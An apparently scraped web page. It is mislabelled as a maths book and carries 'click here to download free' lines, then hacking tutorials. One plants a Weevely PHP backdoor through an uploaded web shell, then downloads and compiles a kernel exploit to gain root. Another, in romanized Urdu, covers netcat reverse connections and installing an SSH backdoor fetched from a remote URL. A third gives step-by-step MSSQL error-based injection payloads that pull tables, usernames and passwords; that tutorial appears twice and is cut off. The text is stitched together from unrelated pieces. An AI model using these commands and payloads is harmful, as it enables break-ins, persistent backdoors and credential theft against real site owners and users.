hi its a book about maths written by subir kumar mukherjee i hope you will enjoy this book
CLICK HERE TO DOWNLOAD FREE
By rUsTlEs xEr0
CLICK HERE TO DOWNLOAD FREE
By rUsTlEs xEr0
1 BackDoor & Rooting With Backtrack 5
By rUsTlEs xEr0
Assalam O Alaikum All!!
Today Im going to post a tutorial Related to Backdoor Via Backtrack 5.
Now For this You need A Virtual Machine Install with Bt5.
oK.. NoW LeTs Start..
Assume our target site : http://target.com/
Now we have hacked admin panel of site via sql injection. The site was sql vulnerable (Assumption)
Admin pAnel: http://target.com/admin/index.php
After logging into the admin panel we have uploaded our shell (r57.php)
shell location on server: http://target.com/uploads/r57.php
now..
Run you Vmware >> Backtrack 5...
The game starts now..
Backdooring a server with encrypted php backdoor.. amazing!!
root@bt:~#
root@bt:~# cd /pentest/backdoors/web/weevely
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
Where
-p = your password to access the backdoor
-g = generate a new encrypted php file (it doesn’t actually encrypt the file, they encode it)
-o = specify your output file
root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o /root/Desktop/bdoor.php -p rustles
+ Backdoor file ‘bdoor.php ’ created with password ‘rustles".Now go and check your desktop. There will be a encrypted php file bdoor.php .
=>FireFox ---> http://target.com/uploads/r57.php ---> Upload bdoor.php
=>FireFox ---> http://target.com/uploads/bdoor.php ---> bdoor.php location
Now we have to connect to our encrypted bdoor.php
root@bt:/pentest/backdoors/web/weevely# ./main.py -t - u http://target.com/uploads/bdoor.php -p rustles
Weevely 0.3 – Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely Developers
Website: http://code.google.com/p/weevely/
+ Using method ‘system()’.
+ Retrieving terminal basic environment variables .
[hacker@target.com/] ls
Index.php
admin
uploads
images
config.php
contact.php
Director listing Successful.
[hacker@target.com/] mkdir tmp
Directory tmp successfully created!!
[hacker@target.com/] cd tmp
[hacker@target.com/tmp] mkdir pcp
Directory pcp Successfully Created.
[hacker@target.com/tmp] cd pcp
[hacker@target.com/tmp/pcp] uname -r / -a
Linux 2.6.32 kernel (Assume)
[hacker@target.com/tmp/pcp]wget http://expoit-2.6.32.com/2.6.32.c
Downloading 2.6.32.c
File Transfer Complete -----------------100% ---------- 2.6.32.c
[hacker@target.com/tmp/pcp] ls
2.6.32.c
Directory Successfully listed.
[hacker@target.com/tmp/pcp] gcc 2.6.32.c -o hackall
-
-
done
[hacker@target.com/tmp/pcp] ./hackall
-
-
[hacker@target.com/tmp/pcp] id
uid=(root) gid=(root)
[hacker@target.com/tmp/pcp]
Rooted ... Enjoy!!
Special Thnx to Hack All
1 How To Root Server Very Detailed [Advance In Urdu]
[TUT]How To Root Server Very Detailed [Advance In Urdu]
How To Root The Server
Maqsad
Mera Name Masoom Killer Hei Aur Dangerous Hacker B Mera Name HEi Kafi Forums....
Par Me Aap Ko AAj Aik Anokhi Cheez Sekhao Ga Wo B Urdu Me
Shaid K Urdu Me Koi Aisa Tutrial Ho Lekn Mene Aaj Tak Nahe Dekha Ye Urdu Samjny Walo K Leye Me Likh Raha Hon Q K Me B Pehly
ApKi He Stage par Tha Tu Hamesha Urdu Ki Request Karta Tha Lekn Urdu Me Koi Zehmat Nahe Karta Tha Mere Abi B Comment Pary hongy
Like this" Please Urdu Me Samjao ,Its Good But Ye Tutrial Urdu Me Hona Chaye Tha" Aur Waise B Ye Tutorial English Me Bohat
Arsy SE Internet Par Aya Howa Hei Hum Paki Hei Na Is Leye Hum Ko In Chezo ka Ilm Tab Hota Hei Jab Ye Cheze Aam Ho Jati hein
Anyway Hum Apny Point Par Aty Hein...
Hum Jo Sekhy Gy Wo Beginner (Medium) Hackers K Leye Hei Jo Websit Tu Hack Kar Lety hein Yeni Shell Upload Kar Lety Hein par Pata Nahe Hota K Usko
Karna Kia hei Tu Me Aap Ko Rooting Karna Sekhaonga K kaise Root Karna Hei Server Ko
First Of All Thanks To Google.com & PCA & ABH & HF And Other Hackers Who Helped Me
Chalo G STart Karte hein
Kuch Sawalo K Jawab
1=Rooting Kia Hota Hei ??
Rooting Asal me Main Admin Tak Ponchna Yeni Is Sit Ka Admin Name Kia hei Aur Isko Bypass Kaise karte Hein Rooting Kehty hein
Asaan Alfaaz Me User Me Access Karna "Root" Kehlata hei.....
2=Hum Ko Rooting K Leye Kia Kuch Chaye?
1:-App K Paas "Shell Upload" Hona Chaye Jo Me Aap Ko Nahe Dy Sakta...
2:-App K Pass "Exploit" Hona Chaye jo K Exploit Section Me Aap Ko Mil Sakta hei...
3:-Aap K Pass "Log Cleaner" Hona Chaye Jo K Apko Mera Dost Dy Ga ( What The Hell Who is your Friend):@ Simply Google.Com...
4:-App K pass "SSH Backdoor" Hona Chaye Ye B Mere Dost K Pass He Hei G.....
5:-App K Pass "netCat" Hona Chaye Ye B Mere Dost SE He Mile Ga Yeni www. Google .Com Se....
6:-App K Pass "Putty" Software Hona Chaye Jo K Aap Ko AAp K Dost Google.com SE mily ga.....lol
7:-Aap k Pass "Brain" Hona chaye jo K Sub Se Lazmi Cheez Hei Aur Ye Na Me Dy Sakta HOn Aur Na Google Dy Sakta Hei Ye Sirf "Quraan" Dy Sakta hei....
Sub Se Pehly Hum Servers Se Back Connection Karegy
IS K Leye
Start Par Ja Kar Run Par Ja Kar Cmd Likh Kar Enter Dabana Hei Aap Ne Yeni Command Prompt Open Karna hei Pher Jaha Apny "Netcat"
Save Kiya Hei Wo Likhna hei Pher Exmple
Ap Ne NetCat ko C:// Drive Me Save Kiya Howa hei Tu Ap ne
Code:Cd C://
Pher
Code:Cd netcat
Code:Cd Netcat.Exe
Is K Baad AaP Shell Ki Taraf Ajao Aap Shell Ko Firfox Ya Kisi BRowser Me Open Karo Pher Aap Shell Me Back Connection par Click Karo
Ager Nahe Hei To Koi Shell Upload Karo Jaise "priv8.php or SyRiAn Sh3ll V7 " Ye Hein "SyRiAn Sh3ll V7 " Is The Best Shell ...
Waise Aap Ki marzi hei Jo Marzi Use Karo........
Apna Ip Adress Likho Jo K pehly He Likha Hoga Ip Bar me Pher Port Me 2121 Likhy Aur connect Par Click Kar Do Aap Is Se App Shell Ko Server Par Kar Ly gy
Pher AAp Cmd B Dy Sakty hein Server K Zarye Jis Par Shell Majood hei App Ki Choice Hei...
Ab NetCat Wali Windows Ko Open Karo Aur ye Cmd Do...
[COLOR="#00FF00"]
Code:nc -| -v -p 2121
Ye Cmd Apko Ye OutPut Dy Gi...
c:\netcat>nc -l -v -p 2121
Listning On 2121
Note:
Aap Koi B Opened Port Use Kar Sakty Hein Waise 2121 Thek Rahe Gi Q K Ye Opened Port Hei Anyway Its Your Choice....
2:-Exploit
Humne Ab Sahi Expoit Dondna Hei Jo k Hume Is Cmd Se Pata Chaly ga
Aap Shell Par Pher Chaly jaye Pher Waha type Kare
Code:#Uname -a
Aur Enter Ka Button Dabao Aap Ko Kuch Aisa Nazar Ayega
[admin@www.target.com /home/saijyoti/public_html/cgi-bin]$ uname -a
Linux dualxeon09.ns5.999servers.com 2.6.34-194.26.1.el5 #1 SMP Tue 2011 x86_64 x86_64 x86_64 GNU/Linux
Aap Deekh Sakty Hein K Server Ka Version Karnal 2.6.34 Aur Year 2011 Hei "Its For Exmple"
Aap Ko Ab 2.6.34 2011 Exploit Chaye Jo K Aap Ko Ab Assani Se Mil Sakta hei
# PCA , or Google Ya Pher Kisi B HackForum Se Mil Sakta Hei
Nehe Tu Pher App Ko Offical Websits Se Mil Jaye Ga,,,,,.....
# Leetupload.com
# Exploit-db.com
# Packetstormsecurity.org
# Th3-0utl4ws.com
Using Of Exploit
Exploit Ko Istmaal Kaise karna hei yeni Isko Execute Kaise karna hei
Hum Ne Exploit C: Drive Me Save kar Lia Hei Lekn hum Ko Shell Par Upload Karna Hei Pher isko Compile Karne Ki Zaroorat hogi Aur
Exploit Sirf Upload Karne Se Execute Nahe Hoga Hum Ko "Shell Me TMP Directory Me Jana Hoga " Q K Tmp Hamesha Writable Directory Hoti hei Is ley Hum
Ye Cmd Type kare Gy Shell Par
Code:cd /home/websitusername/public_html/tmp Directory Mukhtlf B Ho Sakti Hei Maslan cd /home/websitusername/public_html/admin/tmp cd /home/websitusername/public_html/image/tmp Waghera Isi Tarah He Kuch Hoga
Pher Ap ne Exploit Server Par Execute Karna Hei Us K Leye
Code:Wget http :// exploitWebsite .com/ 2011-exploits / exploitname.c
Code:http: //exploitwebsite. com/ 2011-exploits/ exploitname.c
Koi WebSite Nahe Hei Is Me Ap ne Website Wo Likhni Hei Jaha Exploit Hei
Jaise Aap Exploit Download Likh Sakte Ho Aap......
Ye Cmd Deny k Baad Kuch Is Tarah Ki Screeen Hogi
Code:admin@www.target.com /home/target_usernemr/public_html/tmp]$ wget http:// exploitwebsite. com/ 2011-exploits/ exploitname.c --2011-09-22 05:12:14-- http://exploitwebsite.com/2011-exploits/exploitname.c Resolving exploitwebsite.com... 199.58.192.192 Connecting to exploitwebsite . com|199.58.192.192|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 16003(15K) [text/x-csrc] Saving to: `exploitname.c'
Note:
199.58.192.192 Ye Apka Ip Adress Hei
Ab Exploit Save Hogia Hei Humare Shelled Server par Ab Hum ne Exploit Ki Permission 777 Me Change Karni Hei....
Is K Leye Hum Cmd Dy Gy
Type
Code:Chmod 777 ExploitName.c
Ab Exploit Humare Server Par Majood Hei Aur Full Control Hei Yeni Full Permission (777) Me Hei...
Abi Khush Mat Ho.....
Ab Hum Ne Exploit Ko Compile Aur Execute Karna Hei Jo Is Cmd Se Hogi.....
Type
Code:gcc -o Exploit Exploitname.c
Ye Compile Ho Kar Exploit Save HO Jaye Ga Aik Exploit K Toor Par...
Pher Hum Ko Agla Proccess Hum Ne Exploit Ko Execute karna Hei Is Cmd Se
Type
Code:./exploit
Apko Server Jawab Dy Ga K Root Hogia hei
Ab Humko Chek Karna Hei K Ye Waqia he Root Howa hei Ya Nahe Tu Hum Ne Ye Cmd Deni Hei......
type
Code:Whoami
Ye Aapko Jawab Dy ga "root"
Kuch Is Tarah Hoga
uid=xxx(root) gid=xx(root) groups=xxx(root)
Pher Ye Type Karna Hei Full Control K Leye
Type
Code:su
Ok Done!
Chup Kar Khush Mat Ho Abi Intermition Shero Howa hei...
(Joking)3:-SSH Backdoor
Ab Hum ne BackDoors Install Karne Hei Tu Hum Ne Ye Cmd Deny Hei
Type
Code:#Wget http:/ / www. urlofbackdoor . com/ sshdoor.zip
Pher Agy Sshdoor.zip Ko Unzip Karna hei
Hum Ye Cmd Dy Gy UnZip K Leye
Type
Code:#Unzip Sshdoor.zip
PHer Extrect Hone K Bad Ye Cmd Deni hei
Type
Code:Cd Sshdoor
Pher Ye Cmd Deni Hei
Code:./run yourpass port
Yourpass Ki Jaga Aap Ne Apna Password Dena Hei Aur Port Ki Jaga Aap Ne Port Likhni Hei
Pher Aap Ne Putty Ko Open karna Hei Aur Connect Kar Dena Hei Putty K Sath ....
Ab Khush Ho Ja Jiger Jo Karna Chahta Hei Server K Sath kar Ly Ab Sever Par Tera Ful Control hei ......
....lolBacdoor Insttaling K Leye Jo Cmd Use Hoi Hein Wo Ye hein
Code:#Wget http : // www.urlofbackdoo r. com/sshdoor.zip #Unzip Sshdoor.zip #Cd sshdoor #./run dangeroushacker 21
Thats All
MukhTlif Language Me Exploit Ko Execute Karny K Leye Aap Ye Cmd Use Kar Sakty hei
C exploit
----------------------
gcc -o exploit exploit.c
chmod +x exploit
./exploit
----------------------
Perl Exploits
---------------
perl exploit.pl
---------------
Python
------------------
python exploit.py
------------------
php
-----------------
php exploit.php
-----------------
zip
----------------
unzip exploit.zip
./run
----------------
Ager Kisi Ko Pher B Samj Na I Ho Tu Please MujSe Mat Pochye ga......
Ye Tutorial Mene Bari Mehnat Se Khud Likha Hei Aur Iska Credit K4rl Team Ko B Jata Hei Ager Koi Ghalti Hoi Ho Tu Plz Maaf Kar Dijye Ga Aur Yahan Post Kar Dijeye ga....Thnx
Just for Education Purpose !!
Special Thnx to HackALL team... :)
0 MSSQL Injection Method of Attack
By rUsTlEs xEr0
MSSQL - injection, method of attack!
###########################
1.1 Introduction
1.2 How to ask Vulnerability page?
1.3 How to prove that the site of weakness?
1.4 How to find version / name of the DB?
1.5 How to discover the names table (table_name)?
1.6 How to discover the names of column (column_name)?
1.7 How to get data from tables that interest us (eg name, pass, email, etc.)?
1.8 Conclusion?
[1.1 Introduction]
############
This lesson will try to explain that you already know the different techniques, MSSQL-injection.
Who will have the opportunity to learn how this method is used as a favorite act to obtain information (name, password and login) or various other information through this technique.
MSSQL-injection, can be used for products that are created by well-known company Microsoft.
This type of injection, then deal with those sites that are coded in ASP / Aspks etc.
There are several types of attacks in this way:
* - Normal MSSQL SQL Injection attacks
* - MSSQL injection in Web services (SOAP injection)
* - Union with MSSQL injection attack
* - ODBC error attack the "Convert"
* - MSSQL Blind SQL Injection attacks, etc. ..
For this will be used for writing this type of attack:
"Attack of the ODBC error message" Convert "
[1.2 How to ask Vulnerability page? ]
############################
How to ask who Vulnerability page is easy. This can use Google services company giant.
Let's open: Google
I write, for example: inurl: "products". "ID"
inurl: "neus.asp" menu "
inurl: "content.asp" under "
inurl: "games.asp" ID "
ETC ....( I decided some examples, you can now use the logic, for better dorks)
[1.3 How to prove that the site of weakness? ]
##################################
So we can understand very easily by adding the following ID page of high comma (,).
And in case that gives us the answer we found no error page means Vulnerability example:
++++++++++++++++++++++++++++++++++++++
/ Microsoft Access ODBC driver /
++++++++++++++++++++++++++++++++++++++
/ Open quotation /
++++++++++++++++++++++++++++++++++++++
/ Microsoft Amos DB provider for Oracle /
++++++++++++++++++++++++++++++++++++++
/ Division by zero in /
++++++++++++++++++++++++++++++++++++++
These are some of the most common response is shown pages that are weaknesses in the MSSQL - injection.
Should now act as an example here, and where to put high ( ').
For example:
--------------------------------------
http://www.localhost.com/ / news.asp? id = 100 '
--------------------------------------
Now we can say that the error is displayed:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e14 '
Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
This page has weaknesses!
[1.4 How to find version 2.4 / DB name? ]
############################
Let the example easier to understand:
Version:
-------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (@ @ version)) --
-------------------------------------------------- ------------------
And we have presented an example:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion failed when converting nvarchar value 'MS SQL Server 2008 (SP1) - 10.0.2531.0 (64) 29. March 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Edition (64-bit), the operating systems Windows NT 6.0 <x64> (Build 6002: Service Pack 2) (SM), a data type Int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++
Now go find DB_Name:
-------------------------------------------------- -------------------
http://www.localhost.com/ /news.asp? id = 100 + or +1 = convert (int (DB_Name ()))--
-------------------------------------------------- -------------------
eg.
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is not EVILZONE_CREW_DB when converting nvarchar value 'to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++
[1.5 How to discover the names table (table_name)]
######################################
Because it is discovered, or simply to find the side of the table goes through this method.
For example:
-------------------------------------------------- -------------------------------------------------- --------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from information_schema.tables)) --
-------------------------------------------------- -------------------------------------------------- --------------
And now there will be a mistake, such as:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is when converting nvarchar value of users' data on the type Int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
That is, in this case the table (table_name) The first is the 'Users', now find the following table:
For example:
-------------------------------------------------- -------------------------------------------------- ------------------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users')))--
-------------------------------------------------- -------------------------------------------------- ------------------------------------------------
And now an error message will appear the same and will give another table:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is not news when converting nvarchar value 'to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Another table in this case is 'news'
Now to find the table (table_name) third goes like this:
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users',' news')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------
I appear to us the third table:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is when converting nvarchar value categories' of data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Then the third table 'categories', and so on until you find all the tables.
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users', 'news', 'Categories'))) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
[1.6 How to discover the names of column (column_name)]
###########################################
-If you want to column_name for users as' go:
For example:
-------------------------------------------------- -------------------------------------------------- -----------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users'))--
-------------------------------------------------- -------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion failed when converting nvarchar value 'Name' to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
So colums name for the table (table_name) 'Users' the 'name'
Now find the column (column_name) other at the same table 'Users':
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users' and column_name (' name')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- --------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is not a password when converting nvarchar value 'to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
columnes name (column_name) the other is 'password', now go find a rotating column_name:
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users' and column_name ( 'name', 'password'))) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion failed when converting nvarchar value 'emailaddress' to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Therefore, the third Colum_name 'emailaddress' and so on and on until the end, to find all of the columns (column_name)!
[1.7 How to get data that interest you (our user name, pass, email, etc.)]
################################################## ###
To do so you do not have anything to ndyshe we mentioned before.
In this section, all that needs to be done is to table (table_name), and the names of column (column_name) in their earlier results found.
In this section will be used:
Table_name = Users
Column_name = user name, password, emailaddress!
Some have now replaced the example:
-------------------------------------------------- -----------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 name from Users)) --
-------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is not an administrator when converting nvarchar value 'to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
user name : Administrator
Replacing now the first column "Name" in the second column "password":
For example:
-------------------------------------------------- -----------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top password from the user 1)) --
-------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion failed when converting nvarchar value '123456 'to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
password: administratorpassword123
Now, instead of rotating columns works the same as above:
For example:
-------------------------------------------------- ---------------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 from users emailaddress)) --
-------------------------------------------------- ---------------------------------------------
emailaddress: king.cyborg@yahoo.com
Here then we have achieved some info on, and the name / pass and emailaddress page.
user name: Administrator
password: administratorpassword123
emailaddress: [email]king.cyborg@yahoo.com/email]
[ 1.8 Conclusion ]
############
================================================== ===========================
www.localhost.com/news.asp?id=100'
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...(@@version))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...(db_name()))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members' , 'categories')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users'))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username' , 'password')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 username from Users))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 password from Users))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 emailaddress from Users))--
================================================== ===========================
MSSQL - injection, method of attack!
###########################
1.1 Introduction
1.2 How to ask Vulnerability page?
1.3 How to prove that the site of weakness?
1.4 How to find version / name of the DB?
1.5 How to discover the names table (table_name)?
1.6 How to discover the names of column (column_name)?
1.7 How to get data from tables that interest us (eg name, pass, email, etc.)?
1.8 Conclusion?
[1.1 Introduction]
############
This lesson will try to explain that you already know the different techniques, MSSQL-injection.
Who will have the opportunity to learn how this method is used as a favorite act to obtain information (name, password and login) or various other information through this technique.
MSSQL-injection, can be used for products that are created by well-known company Microsoft.
This type of injection, then deal with those sites that are coded in ASP / Aspks etc.
There are several types of attacks in this way:
* - Normal MSSQL SQL Injection attacks
* - MSSQL injection in Web services (SOAP injection)
* - Union with MSSQL injection attack
* - ODBC error attack the "Convert"
* - MSSQL Blind SQL Injection attacks, etc. ..
For this will be used for writing this type of attack:
"Attack of the ODBC error message" Convert "
[1.2 How to ask Vulnerability page? ]
############################
How to ask who Vulnerability page is easy. This can use Google services company giant.
Let's open: Google
I write, for example: inurl: "products". "ID"
inurl: "neus.asp" menu "
inurl: "content.asp" under "
inurl: "games.asp" ID "
ETC ....( I decided some examples, you can now use the logic, for better dorks)
[1.3 How to prove that the site of weakness? ]
##################################
So we can understand very easily by adding the following ID page of high comma (,).
And in case that gives us the answer we found no error page means Vulnerability example:
++++++++++++++++++++++++++++++++++++++
/ Microsoft Access ODBC driver /
++++++++++++++++++++++++++++++++++++++
/ Open quotation /
++++++++++++++++++++++++++++++++++++++
/ Microsoft Amos DB provider for Oracle /
++++++++++++++++++++++++++++++++++++++
/ Division by zero in /
++++++++++++++++++++++++++++++++++++++
These are some of the most common response is shown pages that are weaknesses in the MSSQL - injection.
Should now act as an example here, and where to put high ( ').
For example:
--------------------------------------
http://www.localhost.com/ / news.asp? id = 100 '
--------------------------------------
Now we can say that the error is displayed:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e14 '
Open quotation mark after the character string ") AND (Volgorde> 0) ORDER BY Volgorde '.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
This page has weaknesses!
[1.4 How to find version 2.4 / DB name? ]
############################
Let the example easier to understand:
Version:
-------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (@ @ version)) --
-------------------------------------------------- ------------------
And we have presented an example:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion failed when converting nvarchar value 'MS SQL Server 2008 (SP1) - 10.0.2531.0 (64) 29. March 2009 10:11:52 Copyright (c) 1988-2008 Microsoft Corporation Edition (64-bit), the operating systems Windows NT 6.0 <x64> (Build 6002: Service Pack 2) (SM), a data type Int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++
Now go find DB_Name:
-------------------------------------------------- -------------------
http://www.localhost.com/ /news.asp? id = 100 + or +1 = convert (int (DB_Name ()))--
-------------------------------------------------- -------------------
eg.
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is not EVILZONE_CREW_DB when converting nvarchar value 'to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++
[1.5 How to discover the names table (table_name)]
######################################
Because it is discovered, or simply to find the side of the table goes through this method.
For example:
-------------------------------------------------- -------------------------------------------------- --------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from information_schema.tables)) --
-------------------------------------------------- -------------------------------------------------- --------------
And now there will be a mistake, such as:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is when converting nvarchar value of users' data on the type Int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
That is, in this case the table (table_name) The first is the 'Users', now find the following table:
For example:
-------------------------------------------------- -------------------------------------------------- ------------------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users')))--
-------------------------------------------------- -------------------------------------------------- ------------------------------------------------
And now an error message will appear the same and will give another table:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is not news when converting nvarchar value 'to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Another table in this case is 'news'
Now to find the table (table_name) third goes like this:
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users',' news')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------
I appear to us the third table:
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is when converting nvarchar value categories' of data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Then the third table 'categories', and so on until you find all the tables.
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 table_name from table_name where information_schema.tables not ( 'Users', 'news', 'Categories'))) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
[1.6 How to discover the names of column (column_name)]
###########################################
